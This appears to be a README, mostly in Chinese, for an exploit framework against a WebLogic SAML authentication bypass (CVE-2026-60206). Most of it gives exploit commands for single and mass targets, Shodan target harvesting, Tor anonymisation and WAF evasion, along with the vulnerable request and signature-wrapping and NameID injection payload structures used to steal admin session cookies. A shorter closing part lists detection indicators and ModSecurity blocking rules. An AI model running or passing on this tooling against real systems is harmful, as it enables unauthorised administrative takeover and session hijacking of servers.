
👾 CVE-2026-60206 - Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Bash & Python versions. Features: --detect safe check, --exploit combo/unsigned/xsw/nameid/all, --shodan integration, --tor support, mass scanning, JSON/CSV/JSONL output, cookie validation. 🛡️ CVSS 9.9 Critical - Use Ethically, Stay Legal. 🔒

利用框架及批量扫描器
仅供授权的安全测试使用。
本工具仅供教育和授权的渗透测试之用。
作者和贡献者不对因使用本软件而导致的任何误用或损害负责。用户独自负责确保在测试前已获得目标所有者的明确书面许可。未经授权访问计算机系统违反《计算机欺诈和滥用法》(CFAA) 及全球类似法律。
使用本软件即表示您同意:
⚠️ 警告: 该漏洞正在被积极利用。未经授权使用可能导致严重的法律后果。
CVE-2026-60206 是 Oracle WebLogic Server 中 SAML(安全断言标记语言)实现的一个关键未经认证的认证绕过漏洞。它允许远程攻击者绕过 SAML 认证,无需有效凭据即可获得 WebLogic 控制台的管理员访问权限。
SAML 注入: 该漏洞源于对 SAML 断言的不当验证。攻击者可以构造恶意 SAML 响应,绕过认证检查。
签名绕过: 该漏洞允许通过 XML 签名包装 (XSW) 攻击绕过 XML 签名验证,攻击者将恶意断言与合法签名包装在一起。
NameID 操纵: 攻击者可以注入注释或操纵 NameID 字段以冒充特权用户。
管理员访问: 成功利用使攻击者获得 WebLogic Server 控制台的管理员访问权限,拥有完全控制权。
完整教育性多利用链结合多个 SAML 攻击向量实现认证绕过,具备批量扫描、Cookie 窃取和管理员访问等高级功能。
--detect)安全验证器执行非侵入性漏洞检测,不会执行有害载荷或修改系统。
curl(适用于 Bash 版本)pip(适用于 requests 库,Python 版本)# Python 版本
pip install requests urllib3
# 可选:Shodan 支持
pip install shodan
# Bash 版本:仅需 curl(无额外依赖)
[!NOTE] Bash 版本仅依赖
curl,无外部依赖。Python 版本需要requests和urllib3(可选:shodan用于 Shodan 集成)。
exploit.py)# 单个目标利用(combo 模式)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin
# 使用所有攻击向量进行利用
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v
# 从文件批量扫描(50 线程)
python exploit.py -l targets.txt --exploit -t 50 -o results.json
# 仅安全检测(非侵入式)
python exploit.py -l targets.txt --detect -o scan_results.csv
# Shodan 集成
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit
# Tor 匿名扫描
python exploit.py -l targets.txt --exploit --tor -t 20
# 代理支持
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# 流式 JSONL 输出(大扫描内存高效)
python exploit.py -l targets.txt --exploit -o results.jsonl
# 静默模式(最少输出)
python exploit.py -l targets.txt --exploit -q -o results.json
# 自定义超时和重试
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0
# SSL 验证绕过
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify
# 详细调试
python exploit.py -u https://192.168.1.100:7002 --exploit -v
# 单个目标利用
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin
# 批量扫描
./exploit.sh -l targets.txt --mode all --exploit -o results.json
# Tor 匿名扫描
./exploit.sh -l targets.txt --exploit --tor -t 20
# Shodan 集成
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json
# 流式 JSONL 输出
./exploit.sh -l targets.txt --exploit -o results.jsonl
# 代理支持
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# SSL 验证绕过
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify
# 静默模式
./exploit.sh -l targets.txt --exploit -q -o results.json
# 详细调试
./exploit.sh -u https://192.168.1.100:7002 --exploit -v
# 单个目标验证
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin
# 批量验证并生成报告
./verifier_poc.sh -l targets.txt --user admin -o report.txt
# SSL 验证绕过
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify
# 代理支持
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080
| Oracle WebLogic 版本 |
|---|
⚠️ 重要: 此漏洞影响自托管 WebLogic Server 部署。请立即应用 Oracle CPU 2026 年 7 月。
该漏洞允许攻击者通过构造由 WebLogic 的 SAML 实现不当验证的恶意 SAML 响应来绕过 SAML 认证。
脆弱端点:
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded
SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/
无签名断言
saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>
</saml2:Assertion>
XML 签名包装(XSW)
ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>
<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>
NameID 注释注入
<saml2:NameID Format="...">
lowpriv</saml2:NameID>
成功利用后会获得 JSESSIONID Cookie,从而获得 WebLogic 控制台的管理员访问权限。
窃取的 Cookie 可用于访问:
检查 WebLogic 日志中是否存在:
access.log – 针对 /saml2/sp/acs、/saml2/acs 并带有异常 SAML 参数的请求domain.log – 使用无效 SAML 断言进行的认证绕过尝试diagnostic.log – SAML 解析错误或签名验证失败SAMLResponse 参数包含:
<saml2:Assertion> 标签<saml2:NameID> 字段中的注释javascript: 或 eval()config.xml、jps-config.xml)autodeploy 目录中的新 WAR 文件weblogic.security 文件# 阻止包含多个断言的 SAML 请求
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10001,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Multiple SAML Assertions',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"
# 阻止 NameID 中包含注释的 SAML 请求
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10002,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - NameID Comments',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"
# 阻止无签名的 SAML 断言
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10003,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Unsigned Assertion',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"
| 属性 | 值 |
|---|
| 📅 发现时间 | 2026 年 7 月(Oracle CPU) |
| ⚠️ CVSS 评分 | 9.9(严重) |
| 📋 CISA KEV | 2026 年 7 月 21 日添加 |
| 🎯 受影响产品 | Oracle WebLogic Server(Fusion Middleware) |
| 🔄 修复版本 | Oracle CPU 2026 年 7 月 |
| 🔓 认证要求 | 不需要(预认证) |
| 🌍 主动利用 | 已确认野外利用(2026 年 7 月) |
| 功能 | 描述 |
|---|
| 🚀 多向量利用 | 7 个攻击向量:unsigned、xsw_v1-4、nameid、combo |
| 💻 批量扫描 | 使用线程池(Python)/ FIFO(Bash)进行并发扫描 |
| 🔐 Cookie 窃取 | 窃取 JSESSIONID 用于会话劫持 |
| 👑 管理控制台访问 | 完全管理员权限访问 WebLogic 控制台 |
| 📁 版本检测 | 检测 WebLogic 版本及漏洞状态 |
| 🌐 批量扫描 | 使用线程对多个目标进行批量利用 |
| 🎯 安全检测 | 可选 --detect 标志,用于非侵入性漏洞验证 |
| 🧩 Shodan 集成 | 直接从 Shodan 搜索加载目标 |
| 🔍 Tor 支持 | 通过 Tor 代理匿名扫描 |
| 📊 多种输出格式 | JSON、CSV、JSONL 流式输出 |
| 🪟 跨平台 | 支持 Linux、macOS、BSD、Alpine、WSL |
| 🔒 线程安全 | 使用锁机制确保并发操作安全 |
| 📋 自动保存会话 | 保存成功的 Cookie 供后续使用 |
| ⚙️ WAF 绕过 | User-Agent 轮换和随机延迟 |
| 向量 | 描述 |
|---|
unsigned | 无签名的未认证 SAML 断言 |
xsw_v1 | XML 签名包装 - 多重断言 |
xsw_v2 | XSW - 信封式签名绕过 |
xsw_v3 | XSW - 命名空间操纵 |
xsw_v4 | XSW - 多重断言注入 |
nameid | NameID 注释注入 |
combo | 组合攻击(unsigned + XSW + NameID) |
| 功能 | 描述 |
|---|
| 🔍 WebLogic 检测 | 通过 LoginForm.jsp 识别 WebLogic 实例 |
| 📊 版本检测 | 检测具体 WebLogic 版本及补丁级别 |
| 🧪 SAML 端点发现 | 测试 SAML ACS 端点 |
| 🔒 非侵入式 | 仅识别易受攻击的版本 |
| 📋 JSON/CSV 输出 | 导出结果用于报告 |
| 🔄 批量扫描 | 支持线程的多目标扫描 |
| 状态 |
|---|
| 12.2.1.4.0 | 🔴 易受攻击 |
| 14.1.1.0.0 | 🔴 易受攻击 |
| 14.1.2.0.0 | 🔴 易受攻击 |
| 15.1.1.0.0 | 🔴 易受攻击 |
| 其他版本 | 请查阅 Oracle CPU 2026 年 7 月 |